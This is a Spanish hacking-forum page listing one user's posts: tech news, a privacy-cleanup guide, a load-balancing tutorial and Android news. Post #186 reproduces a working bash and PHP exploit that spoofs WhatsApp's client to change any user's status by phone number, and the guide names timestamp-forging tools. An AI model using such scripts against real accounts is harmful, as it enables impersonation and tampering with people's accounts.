Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - el-brujo

#181
Es una pena, pero sigue quedando mucho estúpido y maleducado en internet...que se aprovechan del cierto anónimato de la red.

Los diarios Marca y Sport anuncia en sus respectivos Twitters, que han tenido que cerrar (ya no moderar) los comentarios de la noticia por la cantidad de insultos y aberraciones que habrán escirto quatro descerebrados a raíz de la noticia del transplante de hígado del jugador francés del F.C.Barcelona, Eirc Abidal.

https://twitter.com/#!/marca/status/180308825960747008

https://twitter.com/#!/Diario_SPORT/status/180344509459214337

Es una pena, no ya que tengan que censurar los contenidos, sino que tengan que eliminar y prohibir directamentelos comentarios en una noticia así. Suerte que, quiero pensar, el 99% había comentado con normalidad la noticia.
#182
La privacidad es un asunto que nunca se toma lo bastante en serio. Hoy en día, con las herramientas adecuadas, cualquiera puede entrar en tu ordenador, saber qué has estado haciendo en las últimas horas y usar esa información en tu contra.

Pasar un limpiador para borrar la caché de los navegadores es útil, pero hay sitios adonde ni siquiera los limpiadores llegan. Son huellas escondidas y a veces protegidas por el sistema operativo. Te las presentamos y te explicamos cómo borrarlas.

Caché de DNS

Cada vez que cargas una página web en tu navegador, Windows pasa la orden a un servidor DNS para que traduzca el nombre del dominio a una dirección IP. Para ahorrar tiempo, el sistema guarda muchas de estas equivalencias en una caché aparte. Ni que decir tiene, esta información puede sacarse con facilidad.



DNSDataView permite ver todas las peticions DNS guardadas por Windows

Abre la opción --> File --> Load Windows DNS caché

Si alguien abre la caché de DNS, por ejemplo con DNSDataView, sabrá qué páginas visitas con mayor frecuencia. Para borrarla, puedes usar esa misma utilidad o bien teclear ipconfig /flushdns en la línea de comandos. CCleaner también permite hacerlo desde la sección Sistema, pero la casilla está desactivada por defecto.


Identificadores de memorias y discos USB conectados

Quizá no sepas que cada vez que conectas un disco a un ordenador con Windows, su identificador queda almacenado en el Registro de Windows. Se puede sacar información tan valiosa como el número de serie, la marca, el modelo y cuando se escribió en el aparato por última vez.



USBOblivion borra las huellas de todas las memorias extraíbles que conectaste en el pasado

Para borrar estas huellas puedes usar USBOblivion, una utilidad portable que escanea el Registro en busca de identificadores de dispositivos de almacenamiento extraíble y los elimina.


Caché de Flash y Java


La caché de los navegadores web se limita a las páginas web y a las imágenes. Muchas aplicaciones web programadas con Flash y Java no se ven afectadas por la limpieza de caché clásica, puesto que almacenan archivos en las caché de los plugins.

CCleaner puede borrar tanto la caché de Flash como la de Java, pero si prefieres tener más control sobre lo que borras hay que recurrir a los paneles de cada complemento. Para Flash, entra en Panel de control de Flash y echa un vistazo al contenido.



Cookies, imágenes, sonidos, partidas de juegos web... la caché de Flash es una mina

Por lo que se refiere a Java, sigue estos sencillos pasos del manual de Oracle. Si quieres evitar que Java almacene contenido temporal en el ordenador, desmarca la primera casilla de la Configuración de archivos temporales.

Borrar la caché de Java es bastante sencillo: solo tienes que hacer clic en Borrar archivos...

Archivo de paginación (Pagefile.sys)

El archivo de paginación, conocido también como espacio de intercambio o swap, se utiliza como memoria virtual en PC que no tienen suficiente RAM para algunas tareas. En el swap acaban muchos datos confidenciales.

En este artículo de Microsoft se explica cómo solicitar a Windows que limpie el archivo Pagefile.sys cada vez que se apague el equipo. Debes abrir el Editor de Registro (regedit.exe) y cambiar el valor ClearPageFileAtShutdown de esta clave:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

El tipo debe ser REG_DWORD y el valor igual a 1. Ten en cuenta que activando esta limpieza el apagado tomará más tiempo, pero te asegurarás de que no queden contraseñas u otros datos en la memoria de intercambio.

Cambia el valor de ClearPageFileAtShutdown a 1 para activar el borrado del swap al apagar

Archivos borrados

Como explicamos en nuestro especial sobre borrado seguro, cuando borras un archivo desde la Papelera no lo estás eliminando para siempre; el PC evita emprender una tarea tan costosa como sobrescribir el disco varias veces.

El prodigioso Hardwipe borra archivos e incluso discos enteros de forma segura

Para eliminar archivos con total garantía de irreversibilidad, usa Hardwipe. Está traducido al español y es muy fácil de usar. Un correcto uso de herramientas de este tipo impide que Recuva y similares sean eficaces.

Fechas de los archivos

Cuando creas o modificas un archivo, el sistema toma nota del momento en que llevaste a cabo esas operaciones. Así, las fechas de creación, modificación y último acceso pueden decir mucho sobre la vida del documento. Cambiar estas fechas de manera efectiva es tan sencillo como usar Timestomp o File Touch.

Con File Touch puedes cambiar la fecha y hora de muchos archivos a la vez



Metadatos


Los metadatos son el carnet de identidad de un archivo. Pueden contener datos sobre el autor, el momento en que se creó el documento o el lugar en que tuvo lugar la edición. Útiles para algunos, peligrosos para otros, conviene saber cómo se borran.

Metadatos EXIF de una foto en formato JPG. Aparecen la cámara y la fecha original

En el especial sobre metadatos presentamos las mejores herramientas para eliminar y editar metadatos, como MetaStripper y Doc Scrubber. La mejor medida, con todo, consiste en configurar los programas de antemano para que no graben metadatos.

Fuente:
http://onsoftware.softonic.com/7-huellas-que-dejas-en-el-pc-sin-saberlo

Vía: meneame.net
#183
Introducción

Conceptos previos, conceptos erróneos y funcionamiento del protocolo de Internet

Cuando alguien entra a su casa , generalmente entra por la puerta , o si es medio paranoico, tal vez por la ventana. Pero nunca por  las dos a la vez, ya que un cuerpo partido a la mitad no puede sobrevivir

En el modelo TCP/IP pasa exactamente lo mismo. Un paquete sale (petición) y entra (respuesta) "obligadamente" siempre por la misma gateway y mismo DNS.

Si un paquete saliera por una puerta de enlace "1",  deberia volver por la misma, porque sino se perdería. (time to live, traceo , etc)

Resumiendo, se puede sumar y aumentar la velocidad global de descargas, pero no la de un archivo en particular.

Teóricamente no es posible descargar 1 solo archivo con dos conexiones diferentes. La razón de esto, es que cuando uno empieza a descargar un archivo de un servidor, el servidor estable una espiece de "tunel" entre tu direccion IP y el para asi poder comunicarse. Dado que las dos conexiones de internet tienen diferentes direcciones IP, el servidor sólo establecera conexión con alguna de las dos. En teorçoa es posible hacerle creer al servidor que las dos conexiones estan bajo 1 sola IP, pero eso causaria un caos al tratar de recibir los paquetes de datos, porque no existe ningún protocolo que regule este tipo de transferencia de datos.

Pero si podemos hacer que este archivo se descargue por segmentos y posteariormente unimos los trozos, con lo que al final el resultado que obtendremos será la suma de bambas conexiones.

Por lo tanto no resulta tan sencillo "sumar" dos conexiones a internet, porque el protocolo tcp/ip tiene ciertas limitaciones. Pero si podremos hacerlo por hardware rápidamente tal y como veremos más adelante.

Lo que normalmente se hace es repartir (que no es lo mismo que sumar a la vez dos conexiones) 2+2 = 4, pero a veces es mejor que unos usen 2 y los otros 2 y no que todos usen 4 a la vez.

Podemos repartir el ancho de banda de varias maneras (QoS) (Calidad del servicio)

- Podemos usar una conexión para navegar y otra para bajar ficheros (por el tipo de tráfico, http, ftp, smtp, pop3, skype, youtube, escritorio remoto), por rangos de ip (por departamentos de trabajo, etc) que unas salga por una conexión y otras por otra)

- Podemos configurar cuánto saldrá por cada WAN y cuantó entrará (kbps) así si   abres en tu PC youtube saldra por WAN1 y si entras a otras webs por WAN2, igual puedes deperminar dominios que salgan por determinada WAN

- Podemos distrubir las solicitudes procedentes de la LAN a través de una politica "round-robin" (por peso) a través de múltiples pasarelas de Internet. En otras palabras, si en un determinado momento sólo hay un usuario de internet haciendo sólo una conexión TCP (por ejemplo, se ejecuta sólo una descarga desde la web), su tráfico se derivará a traves de una única pasarela, por lo que no habría beneficio en el equilibrado de conexiones. En cambio, si la LAN está repleta de usuarios, cada uno ejecutando múltiples solicitudes al mismo tiempo, como un todo, sus conexiones tendrán acceso a un mayor ancho de banda, lo que equivale a la suma de los anchos de banda de acceso único.

IP Failover (fail over, a prueba de fallas)

Failover es cuando tenemos una o más conexiones y cuando falla una salimos automáticamente por la otra que si que funcione. También llamado conexión redundante. Si una de las líneas falla, el router continua automáticamente la conexión utilizando exclusivamente la segunda.




a) Balanceo de Carga (Load balancing)
¿Qué es?
Repartir ancho de banda

El balanceo no suma, reparte.


b) Sumar ancho de banda (Bonding)
Juntar conexiones, unir conexiones, sumar dos conexiones o más

Bonding: ip network multipathing con LINUX

¿Qué es el bonding? Es un driver que originalmente venía con los parches para clusters beowulf, desde hace un tiempo se puede implementar en un kernel 2.2X, 2.4X y 2.6x ¿Pero qué hace realmente?¿Para que sirve? Es la forma de tener dos tarjetas de red funcionando como una sola y aprovechando el ancho de banda de las dos a la vez En definitiva con bonding (ip network multipathing) tendríamos dos tarjetas de red físicas y por encima una virtual que suministra el servicio.

El bonding es una técnica que permite agregar varios interfaces de red físicos en uno único virtual. A cada interfaz físico se le denominará slave (esclavo). Con esto podemos realizar un balanceo de carga entre las dos interfaces y conseguir un ancho de banda final igual a la suma de los anchos de banda de cada slave.

Necesitamos al menos dos conexiones a internet para hacer bonding.

Tipos de Balanceos de Carga con bonding:

Round Robin balance-rr (modo 0)
Va repartiendo el tráfico (entrante) asignando de forma rotatoria cada conexión a una entrada WAN distinta, es decir, la primera a la WAN 01, la siguiente a la WAN 02, la tercera de nuevo a la WAN 01, ...

Se emplea un algoritmo round robin entre la cola virtual y las de los esclavos. Es algo así como: un paquetillo para un esclavo, otro para otro esclavo, un paquetillo para un esclavo, otro para el otro... etc. Es el algoritmo que se usa por defecto.

active-backup (modo 1):

Realmente no balancea la carga, usa sólo un esclavo y en caso de fallar, usa el siguiente disponible. Si falla el activo, pasa al slave (pasivo)

balance-xor (modo 2):

Para transmitir una trama lo hace basado en el siguiente calculo: (MAC de origen XOR MAC destino)%numero de interfaces slaves. De esta manera para cada MAC de destino se selecciona una interfaz en concreto. Este modo nos ofrece balanceo de carga y tolerancia a fallos.

broadcast (modo 3):

se transmite todo por todas las interfaces. Este método no balancea tampoco, pero provee tolerancia a fallos.

802.3ad (modo 4):

Se trata del estandard IEEE 802.3ad (Dynamic link aggregation) también llamado "port trunking". Permite la definición de agregados ofreciendo alta disponibilidad

balance-tlb (modo 5):

balancea la carga de transmisión entre los esclavos dependiendo de la velocidad de estos y de la carga total. El tráfico es recibido por un esclavo, en caso de fallar otro esclavo toma su MAC y continúa recibiendo tráfico.

balance-alb (modo 6)

realiza el balanceo anterior además de un balanceo también en la recepción.


Otros tipos de balanceo de carga en aparatos de hardware:

Basado en sesiones
Cada conexión de salida se compone de varias conexiones TCP/IP, el router reparte las conexiones de cada sesión entre los dos puertos WAN. Un ejemplo, una página de Internet tiene una sesión TCP/IP por cada elemento de la misma, cuando un usuario se conecta a esa página Web a través del router XiNCOM, los elementos de la página se descargan paralelamente y a la vez utilizando las dos líneas WAN de forma simultanea, es decir, repartiendo los elementos entre las dos líneas de conexión.

Basado en paquetes
En lugar de repartir las conexiones TCP/IP de una sesión, el balanceo de carga basado en paquetes reparte los paquetes de cada conexión TCP/IP entre los dos puertos WAN.




Funcionamiento

¿Cómo lo hacemos?

- Mediante Software

En Windows con el programa WinGate, Double surfer, mobile net switch
virtualwifi, BVRP Connection Manager, MultiNetwork Manager, WiFi Hopper 1.2
Midpoint Internet LoadBalancer, etc

Con el comando "route"  (modificando la tabla de rutas, la ruta de encaminamiento, cambiando la puerta de enlace (gateway))

En Linux con pfsense (una distrbución liviana basada en FreeBSD derivada de m0n0wall), Brazilfw, o Mikrotik

pfSense permite balanceo de carga (load balancing) con detección de fallo (fail-over)
con fail-over. Permite además añadir un Portal Cautivo o captivo (hotspot), OpenVPN, gestión del ancho de banda (limitar y repartir ancho de banda) (Traffic Shape), tráfico por prioridades, etc

Con los comandos  iproute2

Ejemplos

                                                                ________
                                         +------------+        /
                                         |            |       |
                           +-------------+ Provider 1 +-------
       __                  |             |            |     /
   ___/  \_         +------+-------+     +------------+    |
 _/        \__      |     if1      |                      /
/             \     |              |                      |
| Local network -----+ Linux router |                      |     Internet
\_           __/    |              |                      |
  \__     __/       |     if2      |                      \
     \___/          +------+-------+     +------------+    |
                           |             |            |     \
                           +-------------+ Provider 2 +-------
                                         |            |       |
                                         +------------+        \________

Datos previos

Si suponemos los siguientes datos:

Citareth0: Interfaz conectado a un ADSL
eth1: Interfaz conectado a otro ADSL
IP0: Dirección IP de la máquina en eth0
IP1: Dirección IP de la máquina en eth1
GW0: Dirección IP del gateway en el interfaz eth0
GW1: Dirección IP del gateway en el interfaz eth1
NET0: Subred de la salida ADSL 0
NET1: Subred de la salida ADSL 1

Definir tablas de rutas

Definir dos tablas de routing auxiliares en el
fichero /etc/iproute2/rt_tables, simplemente añade estas dos lí­neas:

2 T0
3 T1


Añadir rutas de encaminamiento

Añadir información a las dos tablas auxiliares con información de
routing de cada una de las dos salidas:

ip route add default via GW0 dev table T0
ip route add NET0 dev eth0 src IP0 table T0
ip route add default via GW1 dev table T1
ip route add NET1 dev eth1 src IP1 table T1


Añadir las reglas de encaminamiento

Añadir las reglas necesarias para utilizar cada una de las dos tablas
auxiliares:

ip rule add from IP0/32 table T0
ip rule add from IP1/32 table T1


Añadir la ruta por defecto

Añadir la ruta por defecto en la tabla principal, que se encarga de
repartir la carga. Puedes cambiar el peso de cada enlace después del
parámetro weight:

ip route add default scope global nexthop via GW0 dev eth0 weight 1
nexthop via GW1 dev eth1 weight 1


Ejemplo 2:

Cómo juntar dos ADSL

Nomenclatura:

Citareth0  -> primer interfaz conectado a la ADSL1
192.168.1.1  -> IP asociada a eth0
192.168.1.2  -> IP del router ADSL1
192.168.1.0/24  -> subred donde hay ADSL1

eth1  -> primer interfaz conectado a la ADSL2
192.168.2.1  -> IP asociada a eth1
192.168.2.2  -> IP del router ADSL2
192.168.2.0/24  -> subred donde hay ADSL2

Primero:
Crear dos tablas de rutas adicionales al fichero /etc/iproute2/rt_#tables/.
Es tan sencillo como abrir el fichero con un editor de texto y añadir las dos líneas siguientes:
200 ADSL1
201 ADSL2

Segundo:
Asignamos cada subred a la tabla e interfaz correspondiente.
Desde el prompt del sistema:
# ip route add 192.168.1.0/24 dev eth0 src 192.168.1.1 table ADSL1
# ip route add default via 192.168.1.2 table ADSL1
# ip route add 192.168.2.0/24 dev eth1 src 192.168.2.1 table ADSL2
# ip route add default via 192.168.2.2 table ADSL2


Tercero:
Ahora hace falta asegurar que el servidor contesta por la misma interfaz que se ha hecho la petición.
# ip route add 192.168.1.0/24 dev eth0 src 192.168.1.1
# ip route add 192.168.2.0/24 dev eth1 src 192.168.2.1


Quarto:
Sólo hace falta crear la ruta por defecto balanceada.
# ip route add default scope global netxhop via 192.168.1.2 dev eth0 weight 1 nexthop via 192.168.2.2 dev eth1 weight 1


- Mediante Hardware

Routers de doble Wan (Dual Wan) "Multihomed" o "Multiwan".

Balanceador de carga con el protocolo CARP (Common Address Redundancy Protocol), básicamente es proporciona redundancia. Es decir que si tu internet falla, el software lo detecta en decimas de segundo y te hace el switch hacia el enlace bueno, el usuario nunca se da cuenta cuando falla el servicio.

Muxing, multiplexar líneas ADSL.

Sólo es posible por hardware.


Limitar y Repartir ancho de banda

Palabras claves: Traffic Shapper o Traffic Shapping, QoS, fair queuing

QoS (Quality of Service o Calidad de Servicio) es un conjunto de protocolos y tecnologías que garantizan la entrega de datos a través de la red en un momento dado. Una de las principales metas de QoS es la priorización.

Por defecto, cuando enviamos información por una interfaz (tarjeta de red en este caso) las tramas de datos se encolan en una pila FIFO: la primera trama en entrar, es la primera en salir.

Configurar QoS (Quality of Service) en el router.

Los routers Zyxel llevan la opción "Media Bandwidth Management"
http://www.adslzone.net/tutorial-20.18.html

Los routers CT Comtrend para configurar el QoS debes ir a Advanced Setup => Quality of Service dentro de la configuración del router.

Con Mikrotik PCQ (Queues)

Con PfSense y su opción de Traffic Shape.

Con un router que acepte firmware dd-wrt

Programas para Windows como el NetPeeker que permite repartir el ancho de banda (tanto de subida como de bajada) para cada aplicación.

Más programas:

El NetLimiter o el DU Super Controler, o el WebScout, y el Bandwidth Speed Balancer, el Bandwidth Controller, WinTC,
DU Meter, Net Peeker, BWMeter

Para limitar el ancho de banda en Linu hace bastante tiempo que se puede usar:

- iproute2 (TC, traffic control)
- cbq.init

Y para controlar el ancho de banda no, pero para medirlo y controlar mucha más información está el ntop,

http://www.openxtra.com/products/ntop-xtra.htm





Referencias, fuentes
http://www.zeroshell.net/eng/net-balancer-spanish/
http://multingles.net/docs/jmt/2isps.htm
http://crysol.org/es/node/811
http://www.openbsd.org/faq/pf/es/queueing.html
http://www.openbsd.org/faq/pf/index.html
http://bulma.net/body.phtml?nIdNoticia=1759
http://redesteleco.com/balanceo_de_carga
http://guifi.net/es/node/10643
http://gnulinuxtips.blogspot.com/2010/10/balanceo-de-carga-con-pfsense.html
http://doc.pfsense.org/index.php/MultiWanVersion1.2
http://www.openbsd.org/faq/pf/es/queueing.html
http://www.bellera.cat/josep/pfsense/cabal_cs.html




En el foro:

conectarse a varias Wifi a la vez
http://foro.elhacker.net/hacking_wireless/conectarse_a_varias_wifi_a_la_vez-t195713.0.html

Slurpr casero?
http://foro.elhacker.net/hacking_wireless/slurpr_casero-t171149.0.html

¿ PC con varias tarjetas pci Wireless ?
http://foro.elhacker.net/hacking_wireless/iquest_pc_con_varias_tarjetas_pci_wireless-t132517.0.html

Unir 2 adsl
http://foro.elhacker.net/redes/unir_2_adsl_balanceo_de_carga-t319418.0.html

Juntar 2 redes wifi con 2 tarjetas en un mismo ordenador
http://foro.elhacker.net/hacking_wireless/juntar_2_redes_wifi_con_2_tarjetas_en_un_mismo_ordenador-t318331.0.html

wireless router con WDS
http://foro.elhacker.net/redes/wireless_router_con_wds-t309788.0.html

2 o mas cabldemodems en un pc..!!! se pude....!!!
http://foro.elhacker.net/redes/2_o_mas_cabldemodems_en_un_pc_se_pude-t145261.0.html

Manual: balanceo carga PCC con FAILover
http://foro.elhacker.net/materiales_y_equipos/manual_balanceo_carga_pcc_con_failover-t322997.0.html

Balanceo de carga entre dos ISP con Ubuntu 10.04
http://foro.elhacker.net/redes/balanceo_de_carga_entre_dos_isp_con_ubuntu_1004-t311359.0.html

Temas viejos (2005-06-07)

Conectarse a dos redes inalámbricas a la vez
http://foro.elhacker.net/index.php/topic,145048.0.html

Ayuda limitación de ancho de banda
http://foro.elhacker.net/index.php/topic,122243.0.html

como sumar ancho de banda de una o mas redes distintas
http://foro.elhacker.net/index.php/topic,109496.0.html

Varias redes disponibles = varias conexiones distintas??
http://foro.elhacker.net/index.php/topic,68065.0.html

Conectar dos redes con dos tarjetas?
http://foro.elhacker.net/index.php/topic,98696.0.html

software para crear redes vecinales
http://foro.elhacker.net/index.php/topic,145512.0.html
#184
    Los organizadores barajan como alternativas Madrid o Barcelona
    La ciudad definitiva y la fecha se anunciarán en los próximos días
    Será la primera vez en 12 años que Valencia no acoja la Campus Party

La crisis también pasa factura a la Campus Party. Después de 12 años, y por primera vez, este gran encuentro de internautas y aficionados a las nuevas tecnologías no se celebrará en Valencia como consecuencia de las dificultades económicas por las que atraviesa la Generalitat Valenciana.

Pero los campuseros no tienen que temer, porque la decimosexta edición de la Campus Party en España se celebrará "aunque sea debajo de un puente", afirma en su blog Francisco Ragageles, uno de los tres fundadores del evento.

Las ciudades que cuentan con mayores opciones son "Madrid o Barcelona", avanza a RTVE.es Belinda Galiano, otra de las fundadoras de la Campus, Las posibilidades de "hacerlo en una en concreto están muy avanzadas, pero la decisión se tomará en los próximos días", asegura.

    La 16 edición de la Campus Party en España se celebrará aunque sea debajo de un puente

Tanto la Generalitat como la organización querían que la Campus volviese a celebrarse en Valencia, incluso tenían un contrato que les vinculaba "durante otras tres ediciones", pero la "situación tan compleja que vive nuestro país nos ha obligado a desvincularnos de la Comunidad Valenciana", reconoce Galiano.

El convenio fue aprobado por el gobierno valenciano en marzo de 2011 por un importe global de 6,2 millones de euros como cifra máxima, según apunta EFE, aunque se ajustaría cada año al coste real.

A pesar del imprevisto, la popularidad de la Campus ha provocado que no falten ciudades interesadas en albergar el acontecimiento. "Desde que comenzamos a celebrarla, siempre ha habido mucha gente interesada en acogerla, por lo que ahora ha sido más fácil", señala la cofundadora.

Los organizadores confían que la situación se resuelva en "las próximas semanas" e incluso solicitarán la participación de los campuseros "para escoger la fecha en la que se organizará", aunque son las habituales, "la segunda o la tercera semana de julio, pero se hará lo que diga la mayoría", recalca Galiano.

La mayor fiesta on-line del planeta

La Campus Party cumplirá 15 años de vida en agosto. La primera edición se celebró en 1997 en Mollina de Segura, una localidad malagueña de 4.000 habitantes a la que acudieron los 250 primeros campuseros, aunque en el Telediario se referían a estos pioneros como 'campistas informáticos'.


Fuente:
http://www.rtve.es/noticias/20120228/campus-party-deja-valencia-crisis/502398.shtml
#185
'Thunder', 'Pacotron' o 'Troy', tras estos alias se escondían, según la Policía, los cabecillas de Anonymous en España. En total, cuatro personas han sido detenidas y dos de ellas han ingresado en prisión en el marco de una operación internacional que se ha saldado con otros 10 imputados en Argentina, seis en Chile y cinco en Colombia.

En Málaga se ha detenido a F.J.B.D., que operaba bajo el 'nick' de 'Thunder' o 'Pacotron' y que, según la Policía, estaba "presuntamente encargado de administrar y gestionar la infraestructura informática utilizada por Anonymous en España e Iberoamérica".

Dos de los arrestados han ingresado en prisión por orden judicial, otro ha quedado en libertad bajo fianza y el cuarto, menor de edad, bajo la custodia de sus padres. Según la Policía Nacional, los detenidos serían los presuntos responsables de ataques de denegación de servicio -DDoS- y 'defacement' -modificación de una web sin autorización del propietario- a páginas web de partidos políticos, instituciones y empresas, así como de la publicación de datos privados en la Red.

En concreto, se vincula a los sospechosos con los ataques realizados recientemente a la página web de UPyD, así como a la exposición de datos personales de miembros del GEO -Grupo Especial de Operaciones- y personal de seguridad de la presidencia del Gobierno. Poco después, sin embargo, un miembro de Anonymous aseguraba que el colectivo no estaba relacionado con estos ataques.

La Policía, por su parte, afirma que "los ataques cibernéticos respondían en ocasiones a acciones individuales que se apoyaban en una pluralidad de personas que unían sus esfuerzos y conocimientos para perpetrarlos".

Se han intervenido 25 ordenadores personales, discos duros y otros dispositivos de almacenamiento que están todavía siendo analizados. Además, también han bloqueado dos servidores en Bulgaria y la República Checa.

En la operación, coordinada por la Interpol y denominada 'Exposure', hay otros 10 imputados en Argentina, seis en Chile y cinco en Colombia.


Fuente:
http://www.elmundo.es/elmundo/2012/02/28/navegante/1330421554.html
#186
Código (bash) [Seleccionar]
#!/bin/bash
#
# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
 
show_help(){
 echo ""
 echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
 echo ""
 echo " --usage    show the exploit Usage"
 echo " --credits  show the exploit Credits"
 echo " --help     show the Help"
 echo ""
 echo " enJoy"
}
 
show_credits(){
 echo ""
 echo " Emanuele Gentili"
 echo " http://www.emanuelegentili.eu"
 echo " eg @ offensive-security.it"
 echo ""
 echo " Stefano Fratepietro"
 echo " http://steve.deftlinux.net"
 echo " stefano @ deftlinux.net"
 echo ""

}
 
show_usage(){
 echo ""
 echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
 echo ""
 echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
 echo ""
 echo " enJoy"
}


# Bash
while [[ $# != 0 ]]; do
   arg_name=$1; shift
   case "$arg_name" in
     --help|-?|-h) show_help; exit 0;;
     --credits) show_credits; exit 0;;
     --usage) show_usage; exit 0;;
     --countrycode) countrycode=$1; shift;;
     --mobilenum) mobilenum=$2; shift;;
     --text) text=$3; shift;;
     *) echo "invalid option: $1"; show_help;exit 1;;
   esac
done
 
[ -z "$countrycode" ] && { show_help; exit 1; }

whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"

wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php

echo ""
echo "[+] Operazione completata."
echo ""



http://www.exploit-db.com/exploits/18396/

PHP

Código (php) [Seleccionar]
<form method="post">

    <dl>
        <dt>Country code: (example: 31)</dt>
        <dd><input type="text" name="cc" value="31" /></dd>
        <dt>Phonenumber: (example: +31612345678)</dt>
        <dd><input type="text" name="n" value="+316" /></dd>
        <dt>New status:</dt>
        <dd><input type="text" name="m" /></dd>
        <dd><input type="submit" value="Change!" /></dd>
    </dl>

</form>

<?php
ini_set
('display_errors',0);
error_reporting(E_ALL|E_STRICT);
 
if ( 
$_SERVER['REQUEST_METHOD'] === 'POST' 
{
    
$url 'https://s.whatsapp.net/client/iphone/u.php';
    
$fields = array(
        
'cc' => urlencode($_POST['cc']),
        
'me' => urlencode($_POST['n']),
        
's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
    );
 
    
//url-ify the data for the POST
    
foreach ($fields as $key=>$value) {
        
$fields_string .= $key '=' $value '&';
    }
    
rtrim($fields_string'&');
 
    
//open connection
    
$ch curl_init();
 
    
//set the url, number of POST vars, POST data
    
curl_setopt($chCURLOPT_URL$url);
    
curl_setopt($chCURLOPT_POSTcount($fields));
    
curl_setopt($chCURLOPT_POSTFIELDS$fields_string);
    
curl_setopt($chCURLOPT_USERAGENT"WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
 
    
//execute post
    
$result curl_exec($ch);
 
    
//close connection
    
curl_close($ch);
 
}
?>


Ya no funciona:

WhatsApp implemented an IP check – so this doesn't work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/
#187
El contraataque de Anonymous y diversos hackers al cierre de Megaupload ayer por parte del FBI continúa este viernes.

Si ayer a última hora Anonymous tumbaba varias páginas web relacionadas con la ley SOPA y con el cierre del famoso servidor, este viernes han filtrado a través de Twitter y de diversas páginas web todos los supuestos datos personales del director del FBI, Robert S. Mueller, y su familia: su mujer, sus hijas, su yerno y otros miembros.

Los datos que han hecho públicos en la Red alcanzan casi todas las esferas personales de Mueller y su familia: decenas de direcciones de varias ciudades de Estados Unidos, códigos postales, teléfonos y correos electrónicos.



http://www.publico.es/culturas/417937/anonymous-filtra-los-supuestos-datos-personales-del-director-del-fbi-tras-el-cierre-de-megaupload
#189
Samsung Galaxy S se actualiza a Android 2.3.5 Gingerbread con grandes mejoras usando el Samsung Kies. En españa ya está disponible.

Y para el Samsung Galaxy S II está disponible el Android 2.3.6 también a través de l Samsung Kies.



Fuentes:
http://www.tuexperto.com/2011/11/29/samsung-galaxy-s2-llega-la-actualizacion-a-android-2-3-6/
http://www.noticias3d.com/noticia_comentarios.asp?idnoticia=49052
http://www.movilzona.es/2011/11/18/samsung-galaxy-s-recibe-android-2-3-5-gingerbread/
#190


No pensamos que RIM considere el anuncio de Google como un problema muy grave, porque la posibilidad de acceder a Gmail nunca fue la característica más importante de sus móviles. En todo caso, la compañía de Mountain View ha anunciado en pocas palabras y sin muchas explicaciones que ya no ofrecerán soporte para la aplicación de Gmail para BlackBerry. Las personas que ya tienen la aplicación instalada podrán continuar usándola, pero a partir del 22 de noviembre ya no se podrá descargar.

Como alternativa recomiendan usar Gmail desde el navegador, que bien sabemos, en el caso de los BlackBerry es uno de los peores y más incómodos entre todos los móviles.

Sin querer verlo necesariamente como una mala señal para RIM, es imposible no interpretar como una señal de los tiempos que corren que Google anuncie una aplicación de Gmail para iOS, y días después cancelen soporte para BBs.

Fuente:
http://es.engadget.com/2011/11/09/google-ya-no-ofrecera-soporte-para-la-aplicacion-de-gmail-para-b/
#191
Foro Libre / US Vs Greece Vs Italy
9 Noviembre 2011, 12:08 PM
#192




Esta madrugada Google ha hecho oficial la nueva versión de su plataforma para móviles Android. Ice Cream Sandwich (4.0), además de llegar con interesantes novedades a nivel de software, viene acompañado por un terminal referencia de altas prestaciones, el Samsung Galaxy Nexus.

Desde el Nexus One, Google suele acompañar los grandes lanzamientos de nuevas versiones del sistema operativo para móviles con teléfonos. Ya ocurrió también con el Nexus S, y ahora con el Galaxy Nexus.
Ice Cream Sandwich

[youtube=425,350]http://www.youtube.com/watch?v=-F_ke3rxopc[/youtube]

Como principal novedad, encontramos que se trata de una fusión entre las interfaces clásicas de Android para móviles y la que Honeycomb (Android 3.0) llevó a las tablets.

Se eliminan los botones físicos de los móviles para quedar integrados en la pantalla, pudiéndose esconder para trabajar con toda la superficia del panel.

El navegador cambia bastante, ya que a partir de ahora puede manejar hasta 16 pestañas abiertas, además de poder sincronizarse con Chrome en el ordenador de escritorio.

Otro aspecto interesante es el poder determinar un límite de gasto en volumen de tráfico de la tarifa de datos, muy relevante para aquellos que no tienen un plan ilimitado y no quieren sorpresas en la factura final.

Además, se incorpora un sistema de desbloqueo por reconocimiento facial (se requerirá, suponemos, una cámara frontal), nuevos widgets redimensionables, un mejor tratamiento de las notificaciones, efectos en tiempo real con la cámara y programa de edición fotográfica incorporado en la galería.

Por último, la tecnología NFC toma un nuevo uso con el servicio Android Beam, que permitirá compartir contenidos acercando dos teléfonos compatibles, sin ninguna configuración extra.
Galaxy Nexus

Dejando ya de lado el software y entrando en el terreno más físico, Google ha presentado el Galaxy Nexus, un teléfono fabricado por Samsung con la base del Nexus S anterior, pero mejorándolo y dando las pautas de por dónde el mercado parece que se va a mover en los próximos meses.

Y se moverá, con toda probabilidad, por lanzar productos con pantallas más grandes, procesadores más potentes y, en definitiva, teléfonos que se acercan más al concepto de minitablet.

El Galaxy Nexus estrena pantalla de 4,65 pulgadas con resolución 1.280x720 píxeles (316 ppp) y fabricada con tecnología Super AMOLED y la misma apariencia ligeramente curva del Nexus S.
